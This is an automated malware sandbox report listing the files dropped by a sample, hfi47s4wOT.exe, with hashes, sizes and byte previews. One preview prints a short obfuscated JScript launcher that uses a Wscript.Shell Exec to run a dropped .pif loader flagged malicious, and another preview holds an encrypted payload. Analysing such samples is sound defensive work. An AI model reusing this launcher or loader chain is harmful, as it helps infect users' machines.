                                  MD5:106D01F562D751E62B702803895E93E0
                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                  Malicious:false
                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................

                                  C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\287175\Surrey.pif
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):197
                                  Entropy (8bit):4.750945262070887
                                  Encrypted:false
                                  SSDEEP:6:RiJuOybJHonwWDKaJkDprHDNZPOwWDKaJkDprHDaM:YJeQjWaGHDzWWaGHDH
                                  MD5:7A0EE43D396F3E7A4F6CDE8742DFACDA
                                  SHA1:8B3CC35EE3FAA3345FA1DD63C674C41B84F3DB3A
                                  SHA-256:6E2A5503DD3E356B98B90AE7B37E44DE9A26294C38A4F5EB3DE2131C02E48F4B
                                  SHA-512:B5420378C4E96DCD377918BD2AF604D2A545F161CECD7B95944ECE9FCB13C889E26A6254AB0DA6568C2F2FC692873B8C78D357DA292966456C4E92D6911DBE1C
                                  Malicious:true
                                  Preview:new ActiveXObject("Wscript.Sh" + "ell").Exec("\"C:\\Users\\user\\AppData\\Local\\MindZenith Innovations Co\\MindZenithPro.pif\" \"C:\\Users\\user\\AppData\\Local\\MindZenith Innovations Co\\g\"")

                                  C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pif

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\287175\Surrey.pif
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):946784
                                  Entropy (8bit):6.628560786473655
                                  Encrypted:false
                                  SSDEEP:24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
                                  MD5:848164D084384C49937F99D5B894253E
                                  SHA1:3055EF803EEEC4F175EBF120F94125717EE12444
                                  SHA-256:F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
                                  SHA-512:AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: file.exe, Detection: malicious, Browse
                                  • Filename: LisectAVT_2403002A_36.exe, Detection: malicious, Browse
                                  • Filename: LisectAVT_2403002B_223.exe, Detection: malicious, Browse
                                  • Filename: 80441fcf.exe, Detection: malicious, Browse
                                  • Filename: 7d69f17f.exe, Detection: malicious, Browse
                                  • Filename: Filezillawin_94199_patched.exe, Detection: malicious, Browse
                                  • Filename: Filezillawin_94199_patched.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\MindZenith Innovations Co\g

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\287175\Surrey.pif
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):219849
                                  Entropy (8bit):7.999140338780224
                                  Encrypted:true
                                  SSDEEP:6144:/nqejdlyHDXjevm/I/P2sEW1y9Rm36vz79lQPyN:CeTyjXjee/ItEE+mIQPyN
                                  MD5:EB79B63C538A3CAA1BA5D95FCA90CE9D
                                  SHA1:39A5A2DD4D7471BEC6ABF9B424A7EABF327E6B3A
                                  SHA-256:88B2034DF97552F937994968798EFA68BDE49C8CC71AFDD70CA8BAF8BABED965
                                  SHA-512:F962475ED7441391C3CE8CC3C89747184CED5AC29979DCD72607A4E6934A00B2F5BD7ED18E2C09C24123228EB5A4FEABD724592D941DD79AF694C7B1A8A4EECA
                                  Malicious:false
                                  Preview:...;O...x5...V.{..7.(.....`<...!.N.m=.yO.....J.S....f....f.C\....e....F..;y.B..k.*.-*.a..M.Z5..n.@.N..u..+.......s{.....qx.oM.Ho....n...y...N.Z98u^.......zX.....-H.uW[.!...L...6.*...y/.....rKw...-...#..j..h.:Q..j..4....R.3.T.n....$.=..*.P..e.Y...y..D..p....hI.C.Eu....kH.......v.s.p....E...;._>..b....kq..........X.......#..J.X7.....*$.s.~.h......(@...~J]..W0+......5(b.ry..X...y.Q.@......7~.."...Z.g.2#.-X/..........MI8..;.y.6.....-..(..........=.../.[...=..u......9Q$.4...r:.cR.../.......P...T......4.+z,.A.U."..K....Y:.:...?.5..Np(...8...mU..a.]WCCf&.j...Y."....^.6.....R\.S.q...NC.Jy&.Z.....7Z:..&...n.\..Vx..a.u..X.5N.5..7....o./..y...'.4..2+4^o..<.`.Ser$\,].x....q..{.K.....}O..Q....g.U.....$.lk_?.QU.....H.....&v....^;.....tOq.................WO{e......o.F.#w..F.*.V50..z....4v.!$...v..J.f.g.P.....E5|.........S.CXw.._.Z....FO..'..............3m. .Z..G..S4Vn+..t.7u...C=A..Bs........4.3.x.W.j......LBV...S|...C...L....Q.e[.... .T.7.7h.lG.8.K

                                  C:\Users\user\AppData\Local\Temp\287175\B

                                  Download File
                                  Process:C:\Windows\SysWOW64\cmd.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):219849
                                  Entropy (8bit):7.999140338780224
                                  Encrypted:true
                                  SSDEEP:6144:/nqejdlyHDXjevm/I/P2sEW1y9Rm36vz79lQPyN:CeTyjXjee/ItEE+mIQPyN
                                  MD5:EB79B63C538A3CAA1BA5D95FCA90CE9D
                                  SHA1:39A5A2DD4D7471BEC6ABF9B424A7EABF327E6B3A
                                  SHA-256:88B2034DF97552F937994968798EFA68BDE49C8CC71AFDD70CA8BAF8BABED965
                                  SHA-512:F962475ED7441391C3CE8CC3C89747184CED5AC29979DCD72607A4E6934A00B2F5BD7ED18E2C09C24123228EB5A4FEABD724592D941DD79AF694C7B1A8A4EECA
                                  Malicious:false
                                  Preview:...;O...x5...V.{..7.(.....`<...!.N.m=.yO.....J.S....f....f.C\....e....F..;y.B..k.*.-*.a..M.Z5..n.@.N..u..+.......s{.....qx.oM.Ho....n...y...N.Z98u^.......zX.....-H.uW[.!...L...6.*...y/.....rKw...-...#..j..h.:Q..j..4....R.3.T.n....$.=..*.P..e.Y...y..D..p....hI.C.Eu....kH.......v.s.p....E...;._>..b....kq..........X.......#..J.X7.....*$.s.~.h......(@...~J]..W0+......5(b.ry..X...y.Q.@......7~.."...Z.g.2#.-X/..........MI8..;.y.6.....-..(..........=.../.[...=..u......9Q$.4...r:.cR.../.......P...T......4.+z,.A.U."..K....Y:.:...?.5..Np(...8...mU..a.]WCCf&.j...Y."....^.6.....R\.S.q...NC.Jy&.Z.....7Z:..&...n.\..Vx..a.u..X.5N.5..7....o./..y...'.4..2+4^o..<.`.Ser$\,].x....q..{.K.....}O..Q....g.U.....$.lk_?.QU.....H.....&v....^;.....tOq.................WO{e......o.F.#w..F.*.V50..z....4v.!$...v..J.f.g.P.....E5|.........S.CXw.._.Z....FO..'..............3m. .Z..G..S4Vn+..t.7u...C=A..Bs........4.3.x.W.j......LBV...S|...C...L....Q.e[.... .T.7.7h.lG.8.K

                                  C:\Users\user\AppData\Local\Temp\287175\RegAsm.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\287175\Surrey.pif
                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):65440
                                  Entropy (8bit):6.049806962480652
                                  Encrypted:false
                                  SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                  MD5:0D5DF43AF2916F47D00C1573797C1A13
                                  SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                  SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                  SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

                                  C:\Users\user\AppData\Local\Temp\287175\Surrey.pif

                                  Download File
                                  Process:C:\Windows\SysWOW64\cmd.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:modified
                                  Size (bytes):946784
                                  Entropy (8bit):6.628560786473655
                                  Encrypted:false
                                  SSDEEP:24576:LOo8pEnK4mrqlEZuVZ2HOI+X0l1lMZyYFaeBmyF:LF8p4KpqlEZeXI+X0TVcae3F
                                  MD5:848164D084384C49937F99D5B894253E
                                  SHA1:3055EF803EEEC4F175EBF120F94125717EE12444
                                  SHA-256:F58D3A4B2F3F7F10815C24586FAE91964EEED830369E7E0701B43895B0CEFBD3
                                  SHA-512:AABE1CF076F48F32542F49A92E4CA9F054B31D5A9949119991B897B9489FE775D8009896408BA49AC43EC431C87C0D385DAEAD9DBBDE7EF6309B0C97BBAF852A
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\Bang

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):29696
                                  Entropy (8bit):6.464917249281045
                                  Encrypted:false
                                  SSDEEP:768:KfdjxnePB/qLMH/UwA9acl/nqYHjWYPCy8CRrGPL5Eg2:KfRYC6/fA9vNnqYHjZV8CVGD5Et
                                  MD5:4A4B5FC5D6366BA651DB378B62581910
                                  SHA1:6F5226A615435E0C40DC1853CD7F1A70164C49A8
                                  SHA-256:CE2D1826A815467E46B5FAF180B1006E15A53D9355F0BC7E29CC11E56D240F2E
                                  SHA-512:AE152F306F1A0B84F2C40FDA9D455A0CFF4C7F0BC8C4AEB1C6C812982D36FE2696902E05567D6C8158DBC20DD5E68C57D81450EC95A7379E662D7C5950956154
                                  Malicious:false
                                  Preview:....4......AaI..$..aI..E..... ...Pj..u.W..H.I....t.VP.u.W..H.I..E.j.SP..(...f....E..E....f;..(M.t.f..u.P..T.I...H.I.VV.u.E..*..H.I.h.(M..E.P......P.2!....t.......PV.u.W....E.........Pj..u.W..........VP.u.W......V.u..9u..Y.>...Ph....W..H.I..o....u...u..Y.....Pj.h.......u..Kp.....G.....t.f91t..u.j.h......u.W..$.I.h?B..h@B..h....W..H.I..E..............M..U.j.j..K...YY.E.PVh.........].........j .E.VP.Y.......].h.(M..E.P......P.. ....t6f..............E......E.t..E.PVh`...W..H.I.........F.S.!...Y..t.S.....Yf.DC.f;..(M...S....E..E..E.PVh`...W......}..[4........j4.E.VP.....E......@.....8....8.......Pj.hS...S..H.I..E......;....}.h.(M..E.P......P.8.....t;f..............E......E..u.t..E.P.u.ht...S..H.I.........F.W.?...Y..t.W.4...Yf.DG.f;..(M...q....E..E..E.P.u..u.ht...S.,.C........E.............PVh?....s4...........H.I..........i....E.3...(...G............P.......Ph=...........H.I...../.................E.WV.0..X.I......h.........Y...P...0.....P....T.......PV.u...t....s..x..........

                                  C:\Users\user\AppData\Local\Temp\Challenges

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):41984
                                  Entropy (8bit):5.397440044402306
                                  Encrypted:false
                                  SSDEEP:768:3bjBVELX2vn0bU7TTF7Fy2UTZ7IV4NngEt2FNg2fG8MJP7JAqbmZ:nTYGvn4Ufp7Q2Ul7NgEtEq2fG8YWqbmZ
                                  MD5:2279868A6F35625938FB6AA4D5A3DA3D
                                  SHA1:9CE8553896326FAF61C9A7F5B1AE3404BEF74C81
                                  SHA-256:99406D31AD8E8C56612F8B761B6E60C804A1873111BD62DCABB4B771E83AF0EE
                                  SHA-512:07861A101B748C1C0465B8D9977875C92EB6748E76D3E5BF3ED28AAA241784B78BED21E2B68FFF4FCCFF9E2FFFAF22D13C88CBE6D11E2105AD6C590CA0A1D19B
                                  Malicious:false
                                  Preview:x.N.......D..B.M.j..U...@..E.E.P.E.PS..........P...u.......N...].....IP...E..U..H....f.x.O...O..B.U......O...u....|...F.]..u..K....f.x.N..w....E..x.....P......3............~..E..2........@}....|...................E.A;.|.j.j.R..............P...M.....Q...E.......Q...]..P....U..V....}.S.....v....B..E.;...r......u...t(.?+....:.E......M....:f;.u.....m..u.E.;.r..+.E.f9E.s".K....C.....3M..C....3M..{.........M..}.Y...3M..E..X....3M............E..[....C..........H..M.;........U......t...+.E........E.......u.u.f;.u5.E......u.M.;.s,.K....C.....3M..C....3M..{..u.._....E.f9E.r.M..}.Y...3M..E..X....3M...........F...?+....8...f;.]..]..U..U...<....E.f9E......@.....F....F..8.......j.V.........E..........f..R..h.....K..............$.t.@..E...P..............[F....+...........0..<..u.f;..u.t2f;}......@.\....}....c....N..u.;.......V.z....v.........u...E...G....G..8.u..7.O......j..w.........j.W......F.....F............u..7..........6........j..v..........................)E.........

                                  C:\Users\user\AppData\Local\Temp\Currently

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):7168
                                  Entropy (8bit):6.188582325119345
                                  Encrypted:false
                                  SSDEEP:192:LUFDet/rUm8N5cnSr02V7p+EeJYdX/ULhzo1dZcS:LUFDSYm8F1V7pHpX8LNmHcS
                                  MD5:A8973CC913EB7D223D5D8BF1196FD06E
                                  SHA1:AC95437AF1405A15581ABA714117DDF690FF09A7
                                  SHA-256:908C2A969D4D074957C2EC75540FBE8B7246068569083C5593E2C812BC1DFE01
                                  SHA-512:0D17EEB1E3FE643FE59C7BB4F073C64DABCF06CD02C18D8A2018421FE4395895958ECAC0801A08E668E64231B37FB281C09C3D0503664B477F276FCE2E140A43
                                  Malicious:false
                                  Preview:...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B.........................................................................................................................................................................................................................................................................................................d.M.....h9'D......Y.hC'D......Y..-...hH'D......Y...F..hM'D.....Y.Q.%...hR'D.....Y. $M.Q.@.. $M.P.z*..hg'D......Y...,..hl'D..n..

                                  C:\Users\user\AppData\Local\Temp\Documentary

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):16384
                                  Entropy (8bit):6.558365121132706
                                  Encrypted:false
                                  SSDEEP:384:P37mChXgbgGyJXT6K6YAx3Tbb0bjbcrb9eXQ:IvyJXT6K6Lx3Tbb0/bcrRIQ
                                  MD5:B8F2D5358F7F59D77BADDBC8FCF530B8
                                  SHA1:AA1CFEC4F833A4E988B0850F811518BC0CE49F77
                                  SHA-256:6942B711DB74317C720A22221BA1EA71450F999985EA03C179373E3DAB0FB04C
                                  SHA-512:21D21ECD4C3C8B8665168234BD1A2D252584F4DEFF2DBF04CE9B7C24AC324218C4AA4EDC034F2129FDD2BD121BD6C321CC839BB7D866DA7027D963309CD3FBFC
                                  Malicious:false
                                  Preview:......t..E. ...N1..xt...Xu........u.2..at...At.2.......u...t'.D=.0..Xt...At.2............$..x.D=.....^$+^8+....u..F.PS..H...j P.........v..F.PW.E...H...P......N .~........t.......u.WS..H...j0P........j.........?.|..F .....t.WS..H...j P........._^[..]..U.......L.3.E.SV..3.jAZjX..F2Y..d.k......;..>t6;.........Ct?..D~...G........Su....5...........2......j.j..W..Zt....tVH...u.S...........@......p.Mt?..g~1..it...nt...ou....1..........N .Sj....Z............%....v.....s..f...H...t.....f...S.i...8^0..@....V 3.W..]....Af.].j _..t(.......t.j-Xf.E.....t.j+......t.f.}....N2..xt.jXXf;.u........t.....2..at.jA_f;.t.2.....j0_..u...t0jXXf.|].f;.t.jAXf;.t.2............$..xf.f.D].....~$+~8+....u..F.PW..H...j P.........v..F.PS.E.H...P......N .^........t.......u.SW..H...j0P.......j....'....;.|..F .....t.SW..H...j P......._...M.^3.[......]..U.......L.3.E.SV..3.jAZjX..F2Y..d.k......;..>t6;.........Ct?..D~...G........Su................2......j.j..W..Zt....tVH...u.S...........

                                  C:\Users\user\AppData\Local\Temp\Enjoying

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):6.57707350500194
                                  Encrypted:false
                                  SSDEEP:1536:csoqRW1Q/c4l2xyehleX3kBrmTAp7djEQw7fWJhNz96en8FZ/oUh1:clqRWO/9EAehuqCkrwzW3Nzl8F5h1
                                  MD5:3DFEAF5243A8EE0384F9DBB84803B04E
                                  SHA1:B20E3FD43D33A6B7B0580489F99F9383B279CFB1
                                  SHA-256:DF882A9CF7CB9F1E79F397D6096ED26451D718B5031BF41CDDB2831DA881D94C
                                  SHA-512:BD38FD37DE1BC282F8D35CCCAF63569BB5C37DCCC1FDE939A71A917E1AD5E884F18710C271B4BB2EA2922E2CC154D6DD8CBF7A48E93C13BC788876BB44AD339F
                                  Malicious:false
                                  Preview:...;.u"k..&J....k. &J....E.;.t%.`.........L....j Y+.3...3...L..M...E......1....}..uk;.u6..W...p.W.M.....I..U.Y.+j._.u..].E.E.}..t.j...Y..Y.V.M.....I..U.Y;.t....t....u..E.C.;.u..lW...M.H.3...G....U..Q.SW...HL.M..M.QP.X...E.YY.@...]..U..V.u..........F.;...L.t.P.iS..Y.F.;...L.t.P.WS..Y.F.;...L.t.P.ES..Y.F.;...L.t.P.3S..Y.F.;...L.t.P.!S..Y.F ;...L.t.P..S..Y.F$;...L.t.P..R..Y.F8;...L.t.P..R..Y.F<;...L.t.P..R..Y.F@;. .L.t.P..R..Y.FD;.$.L.t.P.R..Y.FH;.(.L.t.P.R..Y.FL;.,.L.t.P.R..Y^]..U..V.u...tY..;...L.t.P.pR..Y.F.;...L.t.P.^R..Y.F.;...L.t.P.LR..Y.F0;...L.t.P.:R..Y.F4;...L.t.P.(R..Y^]..U..E.SV.u.W3......+......;.....#.t..6..Q..G.v.Y;.u._^[]..U..V.u.........j.V.....F.j.P.....F8j.P.....Fhj.P..........j.P.|..........Q.........Q..........Q........j.P.M.........j.P.?.....D......j.P...........j.P. .....L...j.P.......T....+Q....X.... Q....\.....Q....`.....Q....(^]..U.......L.3.E.SVW.u..M...p...M...u..E.@...E.3.3.9E WW.u.....u........PQ....I..E.............K.;.....tJ.K.;

                                  C:\Users\user\AppData\Local\Temp\Entrance

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1476
                                  Entropy (8bit):7.551729211819946
                                  Encrypted:false
                                  SSDEEP:24:srCstRMIkbrUtPqxQWYcmcYS6dpAiul3JBXqYkLYajGKQ6kJBSah4KLMDGqmsdmw:s2UKxbQ0JYcmcY1BIx1ajGKGgahNMGq5
                                  MD5:8BB6F6451930B05DC85B0F6FCDB19E5A
                                  SHA1:3E54F2D1D48ACCAF2ED0248F94459A380DB5C5C0
                                  SHA-256:4E1978DA5B53ACF97D1701D8899FE78100F7791A5C814184B404A8291ECC24C6
                                  SHA-512:3E273E5BFF989F3CCF75D7D18EB86834FBEA8230925BCFCB62B21D2B72FC3FF76F5CA01C362A8DC3B2383D25F088778421CA598359C1D6DD7B772B764998D759
                                  Malicious:false
                                  Preview:.......0.........%v.y.x".......(...v...r.F.C...._$..K.`.F.R...Gpl.d...,...=.+......y.;..w...I.jb/.^..h.'.8...>..&Y.s...&.....[...`.I.(.i;...(..aW7.t..t.:.r/......=...3.+.S.:.s..A. :.....O..2`.W...hh.8&`u..w.... I..@.H..1a.^...w.d.z._...b..l.Ti....n.qv.i.........B0@0...U...........0...U.......0....0...U........K...E$.MP.c.......0...*.H.............K@..P.......TEI....A.....(.3.k.t...-..........sgJ..D{x.nlo.).39E..Wl.....S.-.$l..c..ShgV>...5!..h....S.....]F...zX(./....7A..Dm.S(.~.g........L'.L.ssv.....z..-....,.<.U...~6..WI...-|`..AQ.#...2k.....,3.:;%.@.;,.x.a/....Uo....M.(.r..bPe...1...GX?_1..M0..I...0o0[1.0...U....BE1.0...U....GlobalSign nv-sa110/..U...(GlobalSign Timestamping CA - SHA384 - G4....FiP....p...MA.0...`.H.e........./0...*.H......1...*.H........0-..*.H.....41 0.0...`.H.e..........*.H........0/..*.H......1". k.....bn.&.6v.~..'M......*dBa.!0....*.H......./1..0..0..0... .... .mN'Tr.h.x.edg....e.......0s0_.]0[1.0...U....BE1.0...U....GlobalSign nv-sa11

                                  C:\Users\user\AppData\Local\Temp\Es

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):66560
                                  Entropy (8bit):5.620341776831431
                                  Encrypted:false
                                  SSDEEP:768:J7Vkr5M4INduPbOU7aI4kCD9vm4uyxhSaAwuoc/mex/f:fklMBNIi9u5aAwubPl
                                  MD5:09B20DC3E2F0014DB67090E6FAC90767
                                  SHA1:BC69E9DA60005AAE7BDC9BD2C128BF7FE6DAD7DA
                                  SHA-256:F67C2C41D07746AD7FE48907D21FA6FF52FCFD1A72B1A82FDF635F7D0C291486
                                  SHA-512:EFF6DC10707D0742060B05795FAFBB171F14C7C32C50C75EF065F5E760DCC6454CA945CA966AEDBBD8607871DC4DE8F96F7213A4C8C08B8240F524F6DF3ABF29
                                  Malicious:false
                                  Preview:j..?..[j&,>.......@...L7..?..x..82>.....@.@.......?c.#V..B>.......@...0..?7...Y.>.......@...P...?..[..p&>.......@......?h4.M..A>.....@.@.......?E.p.l.E>.......@....+..?.o..$.E>.......@...h...?\...*.K>.......@.......?-.?...B>.....@.@...P8..?.(l.|.@>.......@....p!.?u...@.J>.......@...@p-.?..V...1>.......@....89.?.....5>.....@.@...<.D.?.....7>.......@...h)P.?.R`D.OG>.......@....T[.?9%....K>.......@....Mf.?.../.<>.....@.@.....q.?.....?>.......@.....{.?4..2G<>.......@...L...?....|/>.......@....Y..?...s..@>.....@.@....k..?....a@>.......@...XS..?x(3..u8>.......@.......?v.O,ib.>.......@......?..&L.C>.....@.@.......?..}...L>.......@....X..?Lo.....>.......@....x..?-....9>.......@....s..?6FID.?9>.....@.@...8J..?....gsL>.......@...d...?....y..>.......@......?>.&.09C>.......@.......?....<.A>.....@.@...(J..?.I..V.C>.......@...`w..?..^.@.N>.......@.......?.#..%.@>.......@....s..?...M..K>.....@.@....D'.?..Q..->.......@.......?9.!...G>.......@.....6.?......1>.......@.....>.?.1..NcB>....

                                  C:\Users\user\AppData\Local\Temp\Formal

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):55296
                                  Entropy (8bit):5.5175724995727355
                                  Encrypted:false
                                  SSDEEP:1536:xuVGHj1vtKs51VqaHwsWcfcd0vtmgMbFuz08Qc:53q5eAg0Fuz08f
                                  MD5:19C76F7F99C8BCBBB171E6F264BBF5E9
                                  SHA1:11A39EDCD4BAF0FCB66DE98359B45BE6E9C6E6B5
                                  SHA-256:55738F778E51252B6C14D6FDECE7C9900F791CB8CF38E9435C9DC0DD20A6DB0D
                                  SHA-512:4D6769E572186B3F668DF946364D16737DAC3A57A1A89689E976D5DD11BFEAB71A4718054D1DAD5D01549036069A3719788325510940F406E1A8544B1DD63E49
                                  Malicious:false
                                  Preview:.F...A.W.i.n.W.a.i.t.D.e.l.a.y.....d.1.#.3.....W.i.n.T.i.t.l.e.M.a.t.c.h.M.o.d.e...d.1.r.1.,.2.....W.i.n.T.e.x.t.M.a.t.c.h.M.o.d.e.....W.i.n.S.e.a.r.c.h.C.h.i.l.d.r.e.n...W.i.n.D.e.t.e.c.t.H.i.d.d.e.n.T.e.x.t...T.r.a.y.O.n.E.v.e.n.t.M.o.d.e...d.0.#.2.....T.r.a.y.M.e.n.u.M.o.d.e.....d.0.#.1.....T.r.a.y.I.c.o.n.H.i.d.e.....T.r.a.y.I.c.o.n.D.e.b.u.g...T.r.a.y.A.u.t.o.P.a.u.s.e...d.1.0.0.m.0.....T.C.P.T.i.m.e.o.u.t.....S.e.t.E.x.i.t.C.o.d.e...S.e.n.d.K.e.y.D.o.w.n.D.e.l.a.y.....S.e.n.d.K.e.y.D.e.l.a.y.....S.e.n.d.C.a.p.s.L.o.c.k.M.o.d.e.....S.e.n.d.A.t.t.a.c.h.M.o.d.e.....P.i.x.e.l.C.o.o.r.d.M.o.d.e.....M.u.s.t.D.e.c.l.a.r.e.V.a.r.s...M.o.u.s.e.C.o.o.r.d.M.o.d.e.....M.o.u.s.e.C.l.i.c.k.D.r.a.g.D.e.l.a.y...M.o.u.s.e.C.l.i.c.k.D.o.w.n.D.e.l.a.y...M.o.u.s.e.C.l.i.c.k.D.e.l.a.y...d.0.r.0.,.1.0.2.3...G.U.I.R.e.s.i.z.e.M.o.d.e...G.U.I.O.n.E.v.e.n.t.M.o.d.e.....d.0.r.0.,.3.....G.U.I.E.v.e.n.t.O.p.t.i.o.n.s...d.1.2.4.c...G.U.I.D.a.t.a.S.e.p.a.r.a.t.o.r.C.h.a.r.....G.U.I.C.o.o.r.d.M.o.d.e.....G.U.

                                  C:\Users\user\AppData\Local\Temp\Furnished

                                  Download File
                                  Process:C:\Users\user\Desktop\hfi47s4wOT.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):20480
                                  Entropy (8bit):6.4409568476888825
                                  Encrypted:false
                                  SSDEEP:384:X2mwcTVmeOwa9XyJZW06WCHAdjs1f9QrEMetI2zbLJSlvuHdUYzGM84qKoiJKsRZ:YMEMUnLm8dUYzp8HKoqKs45T+5htBR
                                  MD5:4DECA4E34D453CCC151A9F25BE72866C
                                  SHA1:064A4C19B00C366777D8C9DFF0563B42B59F7C90
